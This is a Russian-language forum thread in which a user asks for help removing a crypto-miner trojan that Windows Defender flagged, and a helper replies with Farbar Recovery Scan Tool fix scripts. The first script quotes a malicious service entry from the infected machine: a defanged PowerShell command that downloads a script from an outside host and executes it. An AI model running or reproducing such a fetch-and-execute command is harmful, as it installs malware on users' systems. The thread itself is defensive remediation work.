Перейти к содержанию

Рекомендуемые сообщения

Опубликовано (изменено)

Защитник виндовс понятное дело удалять отказывается, действие "удалить" ничего не происходит

Обнаружено: Trojan:Win64/DisguisedXMRigMiner

Состояние: Активно

Обнаружено: Trojan:Win32/Wacatac.A!m

Состояние: Активно

 

Касперский и докторвеб - ничего не находят
 Farbar Recovery Scan Tool
показал следущее

Addition.txt FRST.txt

Изменено пользователем ewixis
  • ewixis изменил название на Trojan:Win64/DisguisedXMRigMiner ,Trojan:Win32/Wacatac.A!m
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-1221974024-4211864995-550959383-1001\...\Run: [AMDNoiseSuppression] => "C:\Windows\system32\AMD\ANR\AMDNoiseSuppression.exe" (Нет файла)
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 MicrosoftConsole; cmd.exe /c powershell.exe irm \"$(irm hxxps://uggsboots.ca/domain)/script?id=MzC5mRi0yY&tag=HWIDSpoofer\" ^| iex [X] <==== ВНИМАНИЕ
File: C:\ProgramData\RuntimeBroker.exe
File: C:\ProgramData\fontdrvhost.exe
FirewallRules: [TCP Query User{2D4AF635-8E99-4B99-B13E-52DF22106299}C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe] => (Allow) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [UDP Query User{5A86FE62-BC0C-424C-B4D4-2B34520C0D83}C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe] => (Allow) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{F5DA0C92-AF5B-4043-A03E-475253806968}] => (Block) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{62A1EF4B-1479-4DB8-AD83-50DC7F2BF843}] => (Block) C:\users\usernc\appdata\roaming\calestial_1.16.5\jdk\bin\java.exe => Нет файла
FirewallRules: [{B003717D-8F91-4BBA-952B-FA55A304FEA1}] => (Block) C:\Program Files\BorisFX\ContinuumAE\13\utilities\bfx-version-update\bfx-version-update.exe => Нет файла
FirewallRules: [{858B83CD-9DD2-45F8-8E08-5638F7C78090}] => (Block) C:\Program Files\BorisFX\Sapphire 2024 Adobe\update-check\update-check.exe => Нет файла
FirewallRules: [{46670F30-615C-49C3-B504-8E9A944AB6D2}] => (Block) C:\Program Files\BorisFX\Sapphire 2024 Adobe\update-check\update-check.exe => Нет файла
FirewallRules: [{AC143033-55F5-4302-BFDB-EDC9D82B15F9}] => (Allow) C:\Program Files\Red Giant\Services\Red Giant Service.exe => Нет файла
FirewallRules: [{589AB3E0-0316-4B13-869A-227AB8866435}] => (Allow) C:\Program Files\Maxon\Tools\mxredirect.exe => Нет файла
AlternateDataStreams: C:\ProgramData:2c21b77e [1262]
AlternateDataStreams: C:\ProgramData:DNS [40]
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\Users\All Users:2c21b77e [1262]
AlternateDataStreams: C:\Users\All Users:DNS [40]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\Все пользователи:2c21b77e [1262]
AlternateDataStreams: C:\Users\Все пользователи:DNS [40]
AlternateDataStreams: C:\Users\Все пользователи:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:2c21b77e [1262]
AlternateDataStreams: C:\ProgramData\Application Data:DNS [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhioihinfh [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjiiiio [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`bfjhjkiihj [0]
AlternateDataStreams: C:\ProgramData\Reprise:jhqduwvxlctbqqijsf`usjbm`vovtfe.qpsu.obnfjhjkiihj [0]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk:F20EF51E1F [3442]
AlternateDataStreams: C:\Users\Public\desktop.ini:WinDeviceId [64]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [8202]
AlternateDataStreams: C:\Users\UserNC\Application Data:2c21b77e [1262]
AlternateDataStreams: C:\Users\UserNC\Application Data:DNS [40]
AlternateDataStreams: C:\Users\UserNC\Application Data:NT [40]
AlternateDataStreams: C:\Users\UserNC\Downloads\jjsploit_8.14.3_x64_en-US.msi:MBAM.Zone.Identifier [180]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:2c21b77e [1262]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:DNS [40]
AlternateDataStreams: C:\Users\UserNC\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\UserNC\Documents\GTA San Andreas User Files:2c21b77e [1262]
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

Опубликовано
2 часа назад, ewixis сказал:

Защитник виндовс понятное дело удалять отказывается, действие "удалить" ничего не происходит

Обнаружено: Trojan:Win64/DisguisedXMRigMiner

Состояние: Активно

Обнаружено: Trojan:Win32/Wacatac.A!m

Состояние: Активно

Защитник справился сам, файлов на компьютере нет.


1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\DetectionHistory\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Detections.log"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\quick\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\resource\*.*"
cmd: del /s /q "C:\ProgramData\Microsoft\Windows Defender\Scans\History\results\system\*.*"
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • QQxR
      Автор QQxR
      15.03.2026 при загрузке системы начало появляться окно PowerShell.
      Мои аккаунты Discord, Steam и Telegram были взломаны, но на данный момент я восстановил к ним доступ. Kaspersky удаляет трояны, но уведомления об угрозах продолжают появляться до сих пор.
      (Примечание: русский язык не является моим родным).

      Application name: powershell.exe
      Application path: C:\Windows\System32\WindowsPowerShell\v1.0
      Component: AMSI Protection
      Result description: Detected
      Type: Trojan
      Name: HEUR:Trojan-Downloader.BAT.Agent.gen
      Precision: Heuristic analysis
      Threat level: High
      Object type: File
      Object name: amsi_stream_1991
      Object path: uid://
      MD5 of an object: B3127F27D52B5A4B709C5ABD09B52141
      Reason: Expert analysis

      Я следую инструкциям, но не очень хорошо читаю по-русски. Посмотрите, пожалуйста, скачал ли я правильную программу?
    • Ugin
      Автор Ugin
      Добрый вечер. Обнаружил у себя на ноутбуке загруженность ЦП на 100% в диспетчере задач. 
      Стоял антивирус ESET, ничего не видел. Удалил его, поставил KVRT, при проверке он обнаружил Trojan.Multi.GenBadur.genw, имя объекта system memory.
      Лечение не помогло, выдал какие-то ошибки. После перезагрузки выполнил полное сканирование, Trojan.Multi.GenBadur.genw появился вновь, также обнаружил четыре Trojan.JS.Trolec.gen.
      Лечение, удаление, перезагрузка, ошибка.. После перезагрузки опять полное сканирование. Trojan.Multi.GenBadur.genw и Trojan.JS.Trolec.gen. 
      Скачал AutoLogger.exe. Прикладываю к сообщению файл протоколов
      CollectionLog-2026.03.12-00.19.zip
    • Андрей Востоков
      Автор Андрей Востоков
      Добрый Вечер! Не получается удалить майнер, после проверки через Malwarebytes программа удаляет майнер, после чего тот устанавливается снова и так каждые 5-10 минут и после перезапуска системы. Отчет по логам и отчет Malwarebytes прилагается 
      CollectionLog-2026.02.11-16.12.zip Malwarebytes Отчет о проверке 2026-02-11 111923.txt
    • LenS
      Автор LenS
      Не поняла, когда проскочил вирус. Возможно, во время загрузки аудио через торент. Каждые две минуты попытки выйти в какие-то "опасные сайты". Антивирус жалуется, что вирусов вообще несколько, но проверка с помощью Kaspersky Virus Removal Tool выявила только одну проблему. Скрины сообщений от антивируса и логи прикрепляю. Помогите, пожалуйста. Коппьютер нужен для работы, не хочется переустанавливать винду



      CollectionLog-2026.02.06-18.15.zip отчет_касперский.txt
    • trotnl
      Автор trotnl
      Недавно мной были замечены странные видео в истории просмотра, которые я, естественно, не смотрел, решил проверить в чем проблема, выяснилось что у меня появилось неизвестного происхождения расширение которое маскируется под adblock, где при переходе на сайт разработчика выходит фейковый сайт (см. прикрепленные фото)

       
       
      Решил удалить напрямую из папки расширений браузера, но это тоже не помогло, они просто подгрузились обратно, далее провел проверку программой Dr.Web CureIt! который нашел следующие проблемы:
       
       

      Также прикрепляю логи: CollectionLog-2026.01.31-13.40.zip Addition.txtFRST.txtAdwCleaner[C00].txt
×
×
  • Создать...